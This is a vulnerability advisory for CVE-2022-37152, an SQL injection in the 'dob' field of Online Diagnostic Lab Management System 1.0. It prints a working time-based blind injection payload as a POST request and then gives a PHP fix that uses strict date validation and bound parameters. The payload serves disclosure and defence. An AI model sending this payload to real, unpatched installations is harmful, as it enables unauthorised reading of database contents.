CVE-2022-37152: GitHub - Fjowel/CVE-2022-37152: An SQL injection was discovered in Online Diagnostic Lab Management System
An issue was discovered in Online Diagnostic Lab Management System 1.0. There is a SQL injection vulnerability via the “dob” parameter in “/classes/Users.php?f=save_client”.
CVE-2022-37152
An SQL injection was discovered in Online Diagnostic Lab Management System
Vul name: SQL Injection of OLDMS
Affected Product: Online Diagnostic Lab Management System v1.0
Affected or fixed version(s): At present, the manufacturer has not released an upgrade patch to fix this security problem
Vul Type: SQL Injection
Impact: A SQL injection vulnerability was found in OLDMS; unauthorized attackers could use it to get database information
vul page: /odlms/classes/Users.php?f=save_client
payload:
POST /odlms/classes/Users.php?f=save_client HTTP/1.1
Content-Disposition: form-data; name="dob"

2022-07-19'+(SELECT 0x4F4C7572 WHERE 1915=1915 AND (SELECT 1784 FROM (SELECT(SLEEP(5)))HMuY))+'
Source Code: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
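
Since no vendor patch exists, a local fix has to treat "dob" as data rather than SQL text. The sketch below is an added example, not code from the project or from this report: it validates the field as a strict YYYY-MM-DD date and passes it as a bound parameter. The function names, the `client_list` table and the in-memory SQLite database are assumptions chosen so the example runs offline.

```php
<?php
declare(strict_types=1);

// Accept only a real calendar date in YYYY-MM-DD form; anything else is rejected.
function parse_dob(string $raw): ?string
{
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    // The round-trip comparison rejects trailing data and overflowed dates (e.g. 2022-02-31).
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : null;
}

// Hypothetical save routine: the value travels as a bound parameter, never as SQL text.
function save_client(PDO $db, string $name, string $rawDob): bool
{
    $dob = parse_dob($rawDob);
    if ($dob === null) {
        return false; // reject before touching the database
    }
    $stmt = $db->prepare('INSERT INTO client_list (name, dob) VALUES (:name, :dob)');
    return $stmt->execute([':name' => $name, ':dob' => $dob]);
}

// Constructed stand-in database (in-memory SQLite); table and columns are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE client_list (id INTEGER PRIMARY KEY, name TEXT, dob TEXT)');

// Constructed inputs: one valid date and the "dob" value quoted in the report above.
$inputs = [
    '2022-07-19',
    "2022-07-19'+(SELECT 0x4F4C7572 WHERE 1915=1915 AND (SELECT 1784 FROM (SELECT(SLEEP(5)))HMuY))+'",
];
foreach ($inputs as $value) {
    $result = save_client($db, 'Test Client', $value) ? 'stored' : 'rejected';
    printf("%-9s %s\n", $result, $value);
}
echo 'rows: ', $db->query('SELECT COUNT(*) FROM client_list')->fetchColumn(), "\n";
```

Either control alone stops this request: the strict date check rejects the value outright, and the bound parameter would store it as inert text if validation were skipped.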